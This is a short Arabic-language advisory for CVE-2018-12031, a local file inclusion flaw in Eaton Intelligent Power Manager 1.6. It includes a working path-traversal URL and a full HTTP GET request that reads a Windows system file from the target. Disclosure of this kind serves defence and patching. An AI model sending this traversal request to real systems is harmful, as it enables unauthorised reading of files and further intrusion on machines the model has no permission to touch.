
CVE-2018-12031 | ثغرة LFI في Eaton Intelligent Power Manager الإصدار 1.6 تسمح للمهاجم بتضمين ملف، مما قد يؤدي إلى كشف معلومات حساسة، رفض الخدمة وتنفيذ أكواد.
ثغرة تضمين الملفات المحلية في برنامج Eaton Intelligent Power Manager الإصدار 1.6 تسمح للمهاجم بتضمين ملف، مما قد يؤدي إلى كشف معلومات حساسة، رفض الخدمة، وتنفيذ برمجيات خبيثة.
لاستغلال الثغرة، يمكن استخدام الطلب التالي: 'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../' للحصول على بعض المعلومات من الهدف.
GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host HTTP/1.1
Host: 192.168.45.138:4680
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
